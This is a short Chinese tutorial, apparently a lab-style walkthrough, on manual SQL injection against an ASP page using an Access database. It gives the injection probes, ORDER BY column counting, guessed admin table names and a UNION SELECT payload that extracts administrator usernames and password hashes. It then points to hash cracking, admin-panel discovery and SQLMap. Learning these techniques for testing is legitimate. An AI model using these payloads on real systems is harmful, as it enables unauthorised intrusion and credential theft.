步骤一:打开网页判断是否存在注入
判断注入点
news_view.asp?id=14' //报错
news_view.asp?id=14 and 1=1 //成功
news_view.asp?id=14 and 1=2 //报错
步骤二:判断当前数据库的字段文件...其到达8时页面置空,说明语句执行失败,当前数据库的字段
仅有7列
?id=14 order by 1
?id=14 order by 7
?id=14 order by 8
步骤三:判断回显的字段及猜测表名称在2与3位置可发现存在字段回显
表名可能有:admin, admins, admin_user, admin_usr ,admin_msg admin_login user username manager, administrator各种大小写变体
步骤四:猜解字段名在2与3位置上查询字段名这里只能考查不能考猜
union select 1,user_name,password,4,5,6,7 from administrator
步骤五:将获取的加密值解密
使用御剑查一下网站管理系统,第二个就是我们所需要的网站
双击这个打开,我们就可以知道管理系统的信息了
步骤六:ACCESS数据库注入过程基本靠猜..当然SQLMapYYDS;其下是整个显错注入流程使用到的语句…
